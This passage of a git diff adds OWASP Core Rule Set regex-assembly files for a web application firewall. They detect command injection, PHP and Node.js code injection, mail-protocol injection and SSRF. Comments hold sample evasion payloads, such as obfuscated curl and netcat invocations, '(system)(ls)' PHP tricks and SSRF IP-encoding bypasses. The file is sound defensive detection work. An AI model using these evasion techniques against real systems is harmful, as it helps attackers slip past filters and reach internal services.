to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + ##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string + ##!< + + ##!> assemble + ##!> include unix-shell-evasion-prefix + ##!< +##!< +##!=> + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include-except unix-shell-upto3 unix-shell-fps-pl2 -- @ [\s<>&|)] ~ \S +##!> include-except unix-shell-4andup unix-shell-fps-pl2 -- @ [\s<>&|)] ~ \S diff --git a/nginx/config/owasp-crs/regex-assembly/932237.ra b/nginx/config/owasp-crs/regex-assembly/932237.ra new file mode 100644 index 00000000..db57f72d --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932237.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!^ \b + +##!$ (?:\b|\W) + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include-except unix-shell-upto3 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S +##!> include-except unix-shell-4andup unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S +##!> include-except unix-shell-pl3 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S diff --git a/nginx/config/owasp-crs/regex-assembly/932238.ra b/nginx/config/owasp-crs/regex-assembly/932238.ra new file mode 100644 index 00000000..b006066c --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932238.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + ##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string + ##!< + + ##!> assemble + ##!> include unix-shell-evasion-prefix + ##!< +##!< +##!=> + +##!> assemble + ##!> cmdline unix + ##!> include unix-shell-pl3 + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932239.ra b/nginx/config/owasp-crs/regex-assembly/932239.ra new file mode 100644 index 00000000..bc4985cb --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932239.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + ##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string + ##!< + + ##!> assemble + ##!> include unix-shell-evasion-prefix + ##!< +##!< +##!=> + +##! These patterns are approximations of the patterns used by the cmdline +##! processor for `@` and `~`. +##! These patterns are used across multiple files, change with care. +##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S +##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S diff --git a/nginx/config/owasp-crs/regex-assembly/932240.ra b/nginx/config/owasp-crs/regex-assembly/932240.ra new file mode 100644 index 00000000..7f56f2ff --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932240.ra @@ -0,0 +1,33 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Rule 932240 (Generic RCE Unix command evasion detection) +##! +##! Conceptually, we want to match: +##! - at least one character +##! - at least one character from an evasion technique + +##!+ i + +##! The previous cmdline evasion detection was based on the one from modsecurity: `[\x5c'\"]*` +##! We extended the evasion detection from the cmdline processor with `(?:\$[a-z0-9_@?!#{*-]*)?(?:\x5c)?` to match: +##! - non-existing vars: cu$@rl, una$$me -a, uname$$u -a +##! - vars + spacing: v='u';cu$v\r\l google.com +##! - globbing pattern expansion: {n$u\c$u,-nlvp,777} +##! - globbing: garb=cur[l];$garb+google.com + +##!> assemble + [a-z0-9_-]+ + ##!=> + [\x5c'\"\[\]]+ + \$+[\x5ca-z0-9_@?!#{*-]+ + ##! process substitution + `` + \$\(\) + <\(\) + >\(\) + ##!=> + + \s*[a-z0-9_-]+ + ##!=> +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932250.ra b/nginx/config/owasp-crs/regex-assembly/932250.ra new file mode 100644 index 00000000..da48fa62 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932250.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932250 (RCE Unix command injection) + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string + + ##!> assemble + ##!> cmdline unix + ##!> include-except unix-shell-upto3 unix-shell-fps-pl1 -- @ "" ~ "" + ##!< + ##!=> + ##! This pattern is an approximation of the pattern used by the cmdline + ##! processor for `@`. + ##! This pattern is used across multiple files, change with care. + [\s<>&|)] + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932260.ra b/nginx/config/owasp-crs/regex-assembly/932260.ra new file mode 100644 index 00000000..d94b7912 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932260.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932260 (RCE Unix command injection) + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string + + ##! These patterns are approximations of the patterns used by the cmdline + ##! processor for `@` and `~`. + ##! These patterns are used across multiple files, change with care. + ##!> include-except unix-shell-4andup unix-shell-fps-pl1 -- @ [\s<>&|)] ~ \S +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932300.ra b/nginx/config/owasp-crs/regex-assembly/932300.ra new file mode 100644 index 00000000..9477717f --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932300.ra @@ -0,0 +1,18 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ (?is)\r\n.*?\b + +##! - SMTP Commands +EHLO [a-zA-Z-\.]{1,255} +HELO [a-zA-Z-\.]{1,255} +MAIL FROM:<.{1,64}@.{1,255}> +RCPT TO:(?:<.{1,64}@.{1,255}>|(?: ))?<.{1,64}> +VRFY (?:.{1,64} <.{1,64}@.{1,255}>|.{1,64}@.{1,255}) +EXPN (?:.{1,64}) +AUTH [A-Z0-9-_]{1,20} (?:=|(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=)) + +##! - SMTP Commands without params +STARTTLS\b +RSET\b +NOOP\b(?: .{1,255})? diff --git a/nginx/config/owasp-crs/regex-assembly/932301.ra b/nginx/config/owasp-crs/regex-assembly/932301.ra new file mode 100644 index 00000000..a19c80cc --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932301.ra @@ -0,0 +1,13 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ (?s)\r\n.*?\b + +##! - SMTP Commands without or optional params +DATA +QUIT +HELP(?: .{1,255})? + +##! - SMTP Commands with params + +##! Not covered - X Command (client extensions) diff --git a/nginx/config/owasp-crs/regex-assembly/932310.ra b/nginx/config/owasp-crs/regex-assembly/932310.ra new file mode 100644 index 00000000..0aaeadcc --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932310.ra @@ -0,0 +1,22 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! All IMAP4 commands start with a "tag" + +##!+ is +##!^ \r\n\w{1,50}\b[ ] + +##! IMAP4 Commands - PL2 + +##! - IMAP4Rev1 Commands - with params +APPEND (?:[\w\"\.\-\x5c\/%\*&#]+)?(?: \((?:[a-z\x5c\ ])+\))?(?: \"?\d{1,2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}\"?)? \{\d{1,20}\+?\} +AUTHENTICATE [a-z0-9-_]{1,20}\r\n +LSUB (?:[\w\"~\/\*#\.]+)? (?:[\w\"\.\x5c\/%\*&]+)? +STATUS (?:[\w\"\.\-\x5c\/%\*&]+)? \((?:UNSEEN|UIDNEXT|MESSAGES|UIDVALIDITY|RECENT| )+\) +UID (?:COPY|FETCH|STORE) (?:[0-9,:\*]+)? +##! - IMAP4Rev1 Commands Extensions - with params +DELETEACL (?:[\w\"\.\-\x5c\/%\*&]+)? +GETACL (?:[\w\"\.\-\x5c\/%\*&]+)? +MYRIGHTS (?:[\w\"\.\-\x5c\/%\*&]+)? +LISTRIGHTS (?:[\w\"\.\-\x5c\/%\*&]+)? +SETACL (?:[\w\"\.\-\x5c\/%\*&]+)? [+-][lrswipckdxtea]+? diff --git a/nginx/config/owasp-crs/regex-assembly/932311.ra b/nginx/config/owasp-crs/regex-assembly/932311.ra new file mode 100644 index 00000000..d1d76f4f --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932311.ra @@ -0,0 +1,44 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! All IMAP4 commands start with a "tag" + +##! TDB: representing charset and language (if needed) +##!+ is +##!^ \r\n\w{1,50}\b[ ] + +##! - IMAP4 Commands - PL3 + +##! - IMAP4Rev1 Commands - with params +CREATE [\w\"\.\-\x5c\/%\*&#]+ +COPY [0-9,:\*]+ [\w\"\.\-\x5c\/%\*&#]+ +DELETE [\w\"\.\-\x5c%\*&#]+ +EXAMINE [\w\"\.\-\x5c%\*&#]+ +FETCH [0-9,:\*]+ +LIST [\w\"~\-\x5c\/\*#\.]+? [\w\"\.\-\x5c\/%\*&#]+ +LOGIN [a-z0-9-_\.\@]{1,40} .*? +RENAME [\w\"\.\-\x5c\/%\*&#]+? [\w\"\.\-\x5c\/%\*&#]+ +SELECT [\w\"\.\-\x5c\/%\*&#]+ +STORE [0-9,:\*]+? [+-]?FLAGS(?:\.SILENT)? (?:\(\x5c[a-z]{1,20}\))? +SUBSCRIBE [\w\"\.\-\x5c\/%\*&#]+ +UNSUBSCRIBE [\w\"\.\-\x5c\/%\*&#]+ +##! Search has plenty of variants +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (KEYWORD \x5c)?(?:ALL|ANSWERED|BCC|DELETED|DRAFT|FLAGGED|RECENT|SEEN|UNANSWERED|UNDELETED|UNDRAFT|UNFLAGGED|UNSEEN|NEW|OLD) +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:BODY|CC|FROM) .{1,255} +SEARCH(?: CHARSET [\w\-_\.]{1,40})? HEADER .{1,100} .{1,255} +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:LARGER \d{1,20}|NOT .{1,255}|[0-9,:\*]+) +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:BEFORE|ON|SENTBEFORE|SENTON|SENTSINCE|SINCE) \"?\d{1,2}-\w{3}-\d{4}\"? +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:OR .{1,255} .{1,255}|SMALLER \d{1,20}|SUBJECT .{1,255}) +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:TEXT .{1,255}|TO .{1,255}|UID [0-9,:\*]+?|UNKEYWORD (?:\x5c(Seen|Answered|Flagged|Deleted|Draft|Recent))) + +##! - IMAP4rev1 Commands - without params +CAPABILITY +CHECK +CLOSE +EXPUNGE +LOGOUT +NOOP +STARTTLS +UNAUTHENTICATE + +##! Not covered - X Command (client extensions) diff --git a/nginx/config/owasp-crs/regex-assembly/932320.ra b/nginx/config/owasp-crs/regex-assembly/932320.ra new file mode 100644 index 00000000..b10c953c --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932320.ra @@ -0,0 +1,18 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! POP3 Commands - PL2 + +##!+ is +##!^ \r\n.*?\b + +##! POP3 Commands - with args +LIST(?: \d+)? +USER .+? +PASS .+? +RETR \d+? +DELE \d+? +UIDL(?: \d+)? +APOP [\w]+ [a-f0-9]{32} +TOP \d+(?: \d+)? +AUTH [A-Z0-9-_]{1,20} (?:=|(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=)) diff --git a/nginx/config/owasp-crs/regex-assembly/932321.ra b/nginx/config/owasp-crs/regex-assembly/932321.ra new file mode 100644 index 00000000..8389557b --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932321.ra @@ -0,0 +1,13 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ (?si)\r\n.*?\b + +##! POP3 Commands - PL3 + +##! POP3 Commands - No args +QUIT +STAT +NOOP +RSET +CAPA diff --git a/nginx/config/owasp-crs/regex-assembly/932370.ra b/nginx/config/owasp-crs/regex-assembly/932370.ra new file mode 100644 index 00000000..1a0289a1 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932370.ra @@ -0,0 +1,206 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932370 (RCE Windows command injection part 1/2) +##! +##! The list comes from the project LOLBAS. You can get it using the following one-liner: +##! `curl -s -H "Accept: application/vnd.github.v3+json" https://api.github.com/repos/LOLBAS-Project/LOLBAS/git/trees/master\?recursive\=1 | jq -r '.tree[].path ' | grep ^yml/ | cut -f3 -d/ | cut -f1 -d. | tr 'A-Z' 'a-z' | sort | uniq` +##! To prevent some FP for a command, you can require command parameters +##! after a command. Only do this if the command regularly causes FP and if +##! allowing the bare command (without parameters) is not too dangerous. +##! (Note: due to \b following the regexp, a word boundary is also required +##! further on, so some letter/number is needed for a match). Example: +##! +##! diff@ + +##!+ i + +##! extension/switches suffix +##! cmd.com, cmd.exe, etc. +##!$ (?:\.[\"\^]*\w+)? +##! cmd/h +##!$ \b + +##! starting tokens prefix +##!> assemble + ##!> include windows-commands-prefix + + ##!> cmdline windows + + acccheckconsole + adplus + advpack + agentexecutor + appinstaller + appvlp + aspnet_compiler + at@ + atbroker + bash + bginfo + bitsadmin + cdb + certoc + certreq + certutil + cl_invocation + cl_loadassembly + cl_mutexverifiers + cmd + cmdkey + cmdl32 + cmstp + comsvcs + configsecuritypolicy + conhost + control + coregen + createdump + csc + cscript + csi + customshellhost + datasvcutil + defaultpack + desk + desktopimgdownldr + devicecredentialdeployment + devtoolslauncher + dfshim + dfsvc + diantz + diskshadow + dnscmd + dnx + dotnet + dump64 + dxcap + esentutl + eventvwr + excel + expand + explorer + extexport + extrac32 + findstr + finger + fltmc + forfiles + fsi + fsianycpu + fsutil + ftp + gfxdownloadwrapper + gpscript + hh + ie4uinit + ieadvpack + ieexec + ieframe + ilasm + imewdbld + infdefaultinstall + installutil + jsc + launch-vsdevshell + ldifde + makecab + manage-bde + mavinject + mftrace + microsoft + mmc + mpcmdrun + msbuild + msconfig + msdeploy + msdt + mshta + mshtml + msiexec + msohtmed + mspub + msxsl + netsh + ntdsutil + odbcconf + offlinescannershell + onedrivestandaloneupdater + openconsole + pcalua + pcwrun + pcwutl + pester + pktmon + pnputil + powerpnt + presentationhost + print + printbrm + procdump + protocolhandler + psr + pubprn + rasautou + rcsi + rdrleakdiag + reg + regasm + regedit + regini + register-cimprovider + regsvcs + regsvr32 + remote + replace + rpcping + rundll32 + runexehelper + runonce + runscripthelper + sc@ + schtasks + scriptrunner + setres + settingsynchost + setupapi + shdocvw + shell32 + sqldumper + sqlps + sqltoolsps + squirrel + ssh + stordiag + syncappvpublishingserver + syssetup + te@ + tracker + ttdinject + tttracer + unregmp2 + update + url + utilityfunctions + vbc + verclsid + visualuiaverifynative + vsiisexelauncher + vsjitdebugger + wab + wfc + winget + winrm + winword + wlrmdr + wmic + workfolders + wscript + wsl + wsreset + wt@ + wuauclt + xwizard + zipfldr + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/932380.ra b/nginx/config/owasp-crs/regex-assembly/932380.ra new file mode 100644 index 00000000..3242abdf --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/932380.ra @@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932380 (RCE Windows command injection part 2/2) +##! +##!+ i + +##! extension/switches suffix +##! cmd.com, cmd.exe, etc. +##!$ (?:\.[\"\^]*\w+)? +##! cmd/h +##!$ \b + +##! starting tokens prefix +##!> assemble + ##!> include windows-commands-prefix + + ##!> cmdline windows + + ##!> include-except windows-commands windows-commands-fps + + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/933131.ra b/nginx/config/owasp-crs/regex-assembly/933131.ra new file mode 100644 index 00000000..717b5d37 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/933131.ra @@ -0,0 +1,19 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +AUTH_TYPE +HTTP_ACCEPT +HTTP_ACCEPT_CHARSET +HTTP_ACCEPT_ENCODING +HTTP_ACCEPT_LANGUAGE +HTTP_CONNECTION +HTTP_HOST +HTTP_KEEP_ALIVE +HTTP_REFERER +HTTP_USER_AGENT +HTTP_X_FORWARDED_FOR +ORIG_PATH_INFO +PATH_INFO +PATH_TRANSLATED +QUERY_STRING +REQUEST_URI diff --git a/nginx/config/owasp-crs/regex-assembly/933160.ra b/nginx/config/owasp-crs/regex-assembly/933160.ra new file mode 100644 index 00000000..ce664710 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/933160.ra @@ -0,0 +1,54 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##! optional opening parenthesis before command +##!^ \b\(? +##! optional quotes +##!^ ['\"]* + +##! match comments: `/*...*/`, `//...`, `#...` +##!$ (?:/\*.*\*/|//.*|#.* +##! match white space and quotes +##!$ |\s|\")* + +##! optional quotes +##!$ ['\"]* +##! optional closing parenthesis after command +##!$ \)?\s* + +##! mandatory parentheses containing optional parameters +##!$ \(.*\) + +assert +assert_options +chr +create_function +eval +exec +file +filegroup +glob +imagegif +imagejpeg +imagepng +imagewbmp +imagexbm +is_a +md5 +opendir +passthru +popen +readfile +tmpfile +unpack + +##! English words, or potential snippets of them, are added here to perform a regex match. +##! Compared to the parallel match performed by 933150, fewer false positives will be generated. +exp +ord +prev +stat +substr +system +unlink diff --git a/nginx/config/owasp-crs/regex-assembly/933161.ra b/nginx/config/owasp-crs/regex-assembly/933161.ra new file mode 100644 index 00000000..e6e25f75 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/933161.ra @@ -0,0 +1,104 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! File autogenerated by util/php-dictionary-gen with: -a 30 -F 90000 -s ../fp-finder/spell.sh + +##!+ i +##!^ \b +##!$ (?:\s|/\*.*\*/|#.*|//.*)*\(.*\) + +abs +asin +assert +assert_options +basename +checkdate +chr +chroot +compact +constant +copy +cos +cosh +count +create_function +crypt +current +date +decoct +define +defined +dir +end +eval +exec +exp +explode +extract +file +fileatime +filectime +filegroup +fileinode +filemtime +fileowner +fileperms +filesize +filetype +flock +floor +flush +glob +hash +header +idate +imagegif +imagejpeg +imagepng +imagewbmp +imagexbm +implode +is_a +key +link +log +mail +max +md5 +min +name +next +opendir +ord +pack +pass +passthru +pi +popen +pow +prev +rand +range +readfile +rename +reset +round +serialize +shuffle +sin +sleep +sort +stat +substr +symlink +syslog +system +tan +time +tmpfile +touch +trim +ucfirst +unlink +unpack +virtual diff --git a/nginx/config/owasp-crs/regex-assembly/933200.ra b/nginx/config/owasp-crs/regex-assembly/933200.ra new file mode 100644 index 00000000..a37d8b31 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/933200.ra @@ -0,0 +1,32 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! PHP Wrappers +##! +##! PHP comes with many built-in wrappers for various URL-style protocols for +##! use with the filesystem functions such as fopen(), copy(), file_exists() and +##! filesize(). Abusing of PHP wrappers like phar:// could lead to RCE as +##! describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even +##! wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and +##! expect:// to RCE. +##! +##! Valid PHP wrappers can be found in the PHP documentation here: +##! https://www.php.net/manual/en/wrappers.php + +##! Suffix marker: all options end with :// +##!$ :// + +bzip2 +expect +glob +ogg +phar +rar +ssh2 +ssh2.shell +ssh2.exec +ssh2.tunnel +ssh2.sftp +ssh2.scp +zip +zlib diff --git a/nginx/config/owasp-crs/regex-assembly/933210.ra b/nginx/config/owasp-crs/regex-assembly/933210.ra new file mode 100644 index 00000000..6162369e --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/933210.ra @@ -0,0 +1,31 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Helpers +##!> define single_or_double_quotes ['"] +##!> define string_in_round_brackets \(.+\) + +##!$ ; + +##!> assemble + ##! example payload: (system)(ls); + {{string_in_round_brackets}}{{string_in_round_brackets}} + + ##! example payload: (sys)"tem"(ls); + {{string_in_round_brackets}}{{single_or_double_quotes}}[a-zA-Z-_0-9]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: a=system&b=$_GET[0](ls); + \[\d+\]{{string_in_round_brackets}} + + ##! example payload: {0}("ls") + \{\d+\}{{string_in_round_brackets}} + + ##! example payload: $a("ls") + \$[^(\),.;\x5c/]+{{string_in_round_brackets}} + + ##! example payload: "system"("ls") + {{single_or_double_quotes}}[a-zA-Z0-9-_\x5c]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: (string)system("ls") + \([^\)]*string[^\)]*\)[a-zA-Z-_0-9\"'.{}\[\]\s]+\([^\)]*\) +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/933211.ra b/nginx/config/owasp-crs/regex-assembly/933211.ra new file mode 100644 index 00000000..77a935a2 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/933211.ra @@ -0,0 +1,30 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Helpers +##!> define single_or_double_quotes ['"] +##!> define string_in_round_brackets \(.+\) +##!$ (?:;|$)? + +##!> assemble + ##! example payload: (system)(ls) + {{string_in_round_brackets}}{{string_in_round_brackets}} + + ##! example payload: (sys)"tem"(ls) + {{string_in_round_brackets}}{{single_or_double_quotes}}[a-zA-Z-_0-9]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: $_GET[0]("ls") + \[\d+\]{{string_in_round_brackets}} + + ##! example payload: {0}("ls") + \{\d+\}{{string_in_round_brackets}} + + ##! example payload: $a("ls") + \$[^(\),.;\x5c/]+{{string_in_round_brackets}} + + ##! example payload: "system"("ls") + {{single_or_double_quotes}}[a-zA-Z0-9-_\x5c]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: (string)system("ls") + \([^\)]*string[^\)]*\)[a-zA-Z-_0-9\"'.{}\[\]\s]+\([^\)]*\) +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/934100.ra b/nginx/config/owasp-crs/regex-assembly/934100.ra new file mode 100644 index 00000000..00d76a5c --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/934100.ra @@ -0,0 +1,230 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Note that the rule uses `multiMatch` and `removeWhitespace. +##! The explicit white space matches will be matched before +##! `removeWhitespace` is applied, everything else will be matched +##! after white space removal. + +##!> define js-prop-start \[['\"`] +##!> define js-prop-start-dynamic \[ +##!> define js-prop-finish ['\"`]\] + + +##! node-serialize serialized function flag +_\$\$ND_FUNC\$\$_ +__js_function +\beval\( +String\.fromCharCode +function\(\){ +new\s+Function\s*\( +this\.constructor +module\.exports= +\(\s*\Wchild_process\W\s*\) + + +##!> assemble + \( + \.call\( + ##!=< js-call +##!< + +##! All "process" method names +##! Note that `sync` will be appended optionally to all, as many +##! of the names have a twin with the `sync` suffix. +##!> assemble + access + appendfile + argv + availability + caveats + chmod + chown + close + copyfile + cp + createreadstream + createwritestream + exec + execfile + exists + fchmod + fchown + fdata + ##! yes, fdatasyncsync + fdatasync + fstat + ##! yes, fsyncsync + fsync + futimes + inodes + lchmod + link + lstat + lutimes + mkdir + mkdtemp + open + opendir + read + readdir + readfile + readlink + readv + rename + rm + spawn + spawnfile + stat + symlink + truncate + unlink + unwatchfile + utimes + watchfile + writefile + write + writev + ##!=> + (?:sync)? + ##!=< process-funcs +##!< + +##! All "process" prop names +##!> assemble + binding + constructor + env + global + main + mainModule + process + require + ##!=< process-props +##!< + +##! All "console" method names +##!> assemble + debug + error + info + trace + warn + ##!=< console-funcs +##!< + +##! All "require" method names +##!> assemble + resolve + ##!=< require-funcs +##!< + +##! All "require" property names +##!> assemble + main + extensions + cache + ##!=< require-props +##!< + + +##! "process" payloads +##!> assemble + process + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> process-funcs + ##!=> js-call + ##!< + + ##! Match properties via their usual syntax: foo.bar + ##!> assemble + \. + ##!=> + ##!=> process-props + ##!< + + ##! Match properties functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!> assemble + ##!=> process-funcs + ##!< + ##!> assemble + ##!=> process-props + ##!< + ##!=> + {{js-prop-finish}} + ##!< +##!< + +##! Match dynamic property access: process[req.query.a] +##! Note that we don't require `process` as a prefix here +##!> assemble + ##!=> process-props + {{js-prop-start-dynamic}} +##!< + + +##! "console" payloads +##!> assemble + console + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> console-funcs + ##!=> js-call + ##!< + + ##! Match properties and functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!=> console-funcs + ##!=> + {{js-prop-finish}} + ##!< +##!< + +##! "require" payloads +##!> assemble + require + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> require-funcs + ##!=> js-call + ##!< + + ##! Match properties via their usual syntax: foo.bar + ##!> assemble + \. + ##!=> + ##!=> require-props + ##!< + + ##! Match properties and functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!> assemble + ##!=> require-funcs + ##!< + ##!> assemble + ##!=> require-props + ##!< + ##!=> + {{js-prop-finish}} + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/934101.ra b/nginx/config/owasp-crs/regex-assembly/934101.ra new file mode 100644 index 00000000..a2ac0723 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/934101.ra @@ -0,0 +1,14 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!$ \s*\( + +close +exists +fork +open +read +spawn +watch +write +require diff --git a/nginx/config/owasp-crs/regex-assembly/934120.ra b/nginx/config/owasp-crs/regex-assembly/934120.ra new file mode 100644 index 00000000..09ff0679 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/934120.ra @@ -0,0 +1,187 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Bypasses and techniques here come from: +##! - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery +##! - https://github.com/cujanovic/SSRF-Testing + +##!+ i + +##! add capture group +##!^ ( +##!$ ) + +##! This regex starts with a list of all the schemes that can be used to make a request +##!> assemble + ##!> include url-schemes + ##!=> + :// + ##!=> + + ##! http://425.510.425.510/ Dotted decimal with overflow (already covered by RFI rule 931100) + ##! http://2852039166/ Dotless decimal + ##! http://7147006462/ Dotless decimal with overflow + \d{10} + + ##! http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal + (?:0x[a-f0-9]{2}\.){3}0x[a-f0-9]{2} + + ##! http://0xA9FEA9FE/ Dotless hexadecimal + 0x[a-f0-9]{8} + + ##! http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow + 0x[a-f0-9]{16} + + ##! http://0251.0376.0251.0376/ Dotted octal + ##! http://0251.00376.000251.0000376/ Dotted octal with padding + (?:0{1,4}\d{1,3}\.){3}0{1,4}\d{1,3} + + ##! http://169.254.43518/ + \d{1,3}\.\d{1,3}\.\d{5} + + ##! http://169.16689662/ + \d{1,3}\.\d{8} + + ##! glibc Name Service Switch abuse + ##! http://\\l\\o\\c\\a\\l\\h\\o\\s\\t (while underscore is not valid RFC syntax, it is allowed and might be used) + (?:\x5c\x5c[a-z\d-]\.?_?)+ + + ##! http://[::ffff:a9fe:a9fe] IPV6 Compressed - IPv6 (base regex from https://ihateregex.io/expr/ipv6/, with [0-9] converted to \d and with non-capturing groups (below)) + ##! http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded + ##! http://[fe80::%zone1] link-local unicast with zone ID + ##! http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 + ##! http://[::] the unspecified address + + ##! Something that looks like IPv6 in a URL. + ##! Matches full and compressed IPv6, link-local IPv6 with + ##! zone ID, and embedded IPv4. + ##! We could match the IPv6 specification here but that would + ##! decrease performance of the regular expression and would + ##! actually increase the possibility for bypasses. + \[[a-f\d:]+(?:[\d.]+|%\w+)?\] + + + ##! These come from https://github.com/cujanovic/SSRF-Testing + ##! These bypasses work by confusing URL parsers in different languages (e.g., PHP, Python, Ruby, Perl) + ##! and libraries (e.g. cURL). The bypasses are parser specific but will often be combined to break + ##! multiple parsers with one try. The goal is often to get the application to call another library + ##! with the malicious URL, e.g. libcurl or glibc (name resolution via gethostbyname(), see also + ##! Name Service Switch abuse above). + + ##! http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ (already covered by RFI rule 931100) + + ##! http://127.88.23.245:22/?@google.com:80/ (already covered by RFI rule 931100) + + ##! http://127.88.23.245:22/#@www.google.com:80/ (already covered by RFI rule 931100) + + ##! http://google.com:80\\@127.88.23.245:22/ (already covered by RFI rule 931100) + + ##! 